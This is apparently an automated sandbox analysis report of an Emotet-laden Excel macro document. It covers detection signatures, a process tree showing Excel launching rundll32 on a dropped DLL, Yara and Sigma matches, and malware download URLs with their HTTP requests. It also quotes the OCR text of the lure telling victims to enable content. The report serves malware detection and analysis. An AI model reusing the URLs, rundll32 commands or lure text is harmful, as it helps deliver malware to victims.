Loading ...

Play interactive tourEdit tour

Windows Analysis Report DOC-0212.xlsm

Overview

General Information

Sample Name:DOC-0212.xlsm
Analysis ID:532596
MD5:aa4f296ed678b18394a365861777241c
SHA1:cedfd0d995958b8550f36d037c732854e23c68c5
SHA256:20d3da22e72baf1a0e865621f9bb0af55998db0c4c534e847f30a084113eec8c
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Emotet RunDLL32 Process Creation
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Xls With Macro 4.0
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1612 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • rundll32.exe (PID: 2684 cmdline: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • rundll32.exe (PID: 1500 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • rundll32.exe (PID: 2948 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • svchost.exe (PID: 2800 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              3.2.rundll32.exe.2ab960.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                3.2.rundll32.exe.2ab960.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.rundll32.exe.2ab960.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    3.2.rundll32.exe.2ab960.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      3.2.rundll32.exe.1ec0000.7.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                        Click to see the 7 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Emotet RunDLL32 Process CreationShow sources
                        Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2684, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL, ProcessId: 1500
                        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1612, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889, ProcessId: 2684

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus detection for URL or domainShow sources
                        Source: http://www.duoyuhudong.cn/wp-content/we8xi/vvC:Avira URL Cloud: Label: malware
                        Source: http://www.duoyuhudong.cn/wp-content/we8xi/Avira URL Cloud: Label: malware
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E450927 FindFirstFileExW,

                        Software Vulnerabilities:

                        barindex
                        Document exploit detected (drops PE files)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: VZZdgPFp2xiOJtfpv[1].dll.0.drJump to dropped file
                        Document exploit detected (creates forbidden files)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dllJump to behavior
                        Document exploit detected (process start blacklist hit)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
                        Document exploit detected (UrlDownloadToFile)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                        Source: global trafficDNS query: name: sadabahar.com.np
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80
                        Source: global trafficHTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.25content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://sadabahar.com.np/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encoding,User-Agentdate: Thu, 02 Dec 2021 13:31:35 GMTserver: LiteSpeedData Raw: 31 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b ff 73 db 36 b2 ff d9 fe 2b 60 7a 6a 8b 2d 49 51 92 65 59 94 e5 de 35 4d e7 fd d0 5e 6f 9a 76 de bc 49 f2 3c 10 09 51 48 28 80 0f 80 64 fb 14 fd ef 37 0b 90 14 bf c9 56 9c a4 b9 99 d7 78 1c 93 c0 62 b1 58 2c b0 9f 5d 80 d7 27 3f fe fa e2 f7 ff f9 e7 4b b4 50 cb e4 e6 f8 1a fe a0 04 b3 78 6a 11 e6 fe f1 ca ba 39 3e be 5e 10 1c dd 1c 1f 5d 2f 89 c2 28 5c 60 21 89 9a 5a 7f fc fe 93 7b 65 15 e5 0c 2f c9 d4 5a 53 72 97 72 a1 2c 14 72 a6 08 53 53 eb 8e 46 6a 31 8d c8 9a 86 c4 d5 2f 0e a2 8c 2a 8a 13 57 86 38 21 d3 9e 83 96 94 d1 e5 6a 99 17 68 b6 09 65 ef 91 20 c9 d4 4a 05 9f d3 84 58 68 21 c8 7c 6a 2d 94 4a 83 6e 37 5e a6 b1 c7 45 dc bd 9f b3 6e af 07 6d 8e ae 15 55 09 b9 f9 27 8e 09 62 5c a1 39 5f b1 08 9d 9d 5e f5 7b bd 09 7a 85 23 3c c3 0b 2c d0 2f ab 44 51 f4 82 33 a9 c4 2a 54 94 b3 eb ae 69 7a 6c 86 a9 87 73 2e f8 8c 2b 79 5e 0c e6 7c 89 ef 5d ba c4 31 71 53 41 60 b0 41 82 45 4c ce 51 f7 e6 f8 ba 10 f8 3c 62 12 08 e6 44 85 8b 73 23 f5 79 b7 3b e7 4c 49 2f e6 3c 4e 08 4e a9 f4 42 be 3c ac a5 f4 ee 60 a4 35 62 0b 27 8a 08 86 15 b1 90 7a 48 c9 d4 c2 69 9a d0 10 c3 78 ba 42 ca ef ee 97 89 85 f4 b8 a6 d6 63 83 47 67 02 ff df 8a 4f d0 4f 84 44 65 35 cb a0 db 95 b9 d6 40 5e 8f a5 dd 39 21 51 d7 aa 0e f9 0b c8 f2 82 2f 97 84 29 79 98 50 61 46 5d 92 ee e8 e8 5a 86 82 a6 2a d3 8e 22 f7 aa fb 0e af b1 29 d5 06 73 74 47 59 c4 ef bc db bb 94 2c f9 3b fa 8a 28 45 59 2c d1 14 6d ac 19 96 e4 0f 91 58 81 36 39 19 bc e9 be e9 66 53 f1 a6 ab cd 40 be e9 86 5c 90 37 5d dd f8 4d b7 37 f0 7a 9e ff a6 3b ea df 8f fa 6f ba 96 63 91 7b 65 05 96 97 b2 d8 72 2c b9 8e 9f c7 4f ae 63 cd 4d ae e3 97 86 a1 5c 6b 86 7c 25 42 62 05 1b 2b e4 2c c4 4a 8b 91 c9 6b c4 ad 4d de 9b ee 5d ea 52 16 26 ab 88 c8 37 dd 77 52 17 e8 66 ae 20 09 c1 92 78 4b ca bc 77 f2 fb 35 11 d3 a1 77 e5 f5 ad ed 76 72 7c 74 74 74 32 5f 31 bd 56 3a c4 c1 8e b2 37 6b 2c 10 73 84 c3 1d 3a c5 5e 28 08 56 e4 65 42 60 d6 3a 56 88 d9 1a 4b cb 76 d2 29 f5 62 a2 5e c0 86 70 af ce ce ca 6f 1d ab 1f 59 f6 24 67 8c 64 87 e4 8c f1 f4 95 12 94 c5 de 5c f0 e5 8b 05 16 2f 78 44 26 a9 17 26 04 8b df 48 a8 3a be e3 3b d4 33 5b 0a f5 16 84 c6 0b 65 3b a9 37 a7 49 f2 3b b9 57 1d ec c1 82 78 e8 a8 05 95 0e b1 1d df f1 ed 09 99 52 4f f1 1f b1 c2 7f fc f6 73 c7 9e 08 a2 56 82 a1 e7 33 56 86 b1 43 a6 d3 2a eb 6d 31 ac b0 43 8c b6 54 53 4f 99 31 da 13 e5 49 11 4e 89 a3 bc 88 cc 89 98 2a cf 2c ea ba d9 3a 18 d4 99 e9 59 fe f0 f0 3b 8e ff 81 97 a4 63 c1 3e 6d d9 af fd b7 30 6c c2 a2 17 0b 9a 44 1d 65 6f e7 5c 74 f8 f4 ef 42 e0 87
                        Source: EXCEL.EXE, 00000000.00000002.753340803.00000000058F9000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma/3 equals www.linkedin.com (Linkedin)
                        Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                        Source: EXCEL.EXE, 00000000.00000002.753340803.00000000058F9000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                        Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
                        Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
                        Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                        Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.c
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.co
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.n
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/w
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-i
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-inc
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-inclu
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI
                        Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad
                        Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/A
                        Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/J
                        Source: EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
                        Source: EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
                        Source: EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
                        Source: EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
                        Source: rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                        Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                        Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                        Source: rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                        Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmpString found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/
                        Source: EXCEL.EXE, 00000000.00000002.747914705.000000000046C000.00000004.00000020.sdmpString found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/vvC:
                        Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
                        Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                        Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                        Source: rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8FA61E5.pngJump to behavior
                        Source: unknownDNS traffic detected: queries for: sadabahar.com.np
                        Source: global trafficHTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive

                        E-Banking Fraud:

                        barindex
                        Yara detected EmotetShow sources
                        Source: Yara matchFile source: 3.2.rundll32.exe.2ab960.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.2ab960.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.1ec0000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.1ec0000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, type: MEMORY

                        System Summary:

                        barindex
                        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                        Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
                        Source: Screenshot number: 4Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
                        Source: Screenshot number: 4Screenshot OCR: Enable Content" button 6 7 8 9 ,, G' 11 12 13 14 15 16 17 18 ^
                        Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
                        Source: Screenshot number: 8Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
                        Source: Screenshot number: 8Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 17 18 ^
                        Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
                        Source: Document image extraction number: 0Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
                        Source: Document image extraction number: 0Screenshot OCR: Enable Content" button
                        Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
                        Source: Document image extraction number: 1Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
                        Source: Document image extraction number: 1Screenshot OCR: Enable Content" button
                        Office process drops PE fileShow sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\Jump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_025E6753
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_025E6743
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_025E6340
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_025E66F3
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_025E66E8
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EE1291
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDEA55
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDEDED
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC51EC
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECA3E7
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC19C0
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC75D2
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDDDA5
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED0BA4
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDE5A7
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED89A2
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC43BE
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC59BF
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDD7BE
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED85B8
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDE3B5
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC358B
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDDB87
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC8D80
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC4B81
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED3782
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC7795
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED1591
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECB191
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECCF6E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECBD61
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EE0370
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED6540
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECA92F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED9124
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECF73B
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDCD35
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED3D0C
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDBF0C
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED590E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED970A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDE10A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC4D1E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECCB13
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED56E9
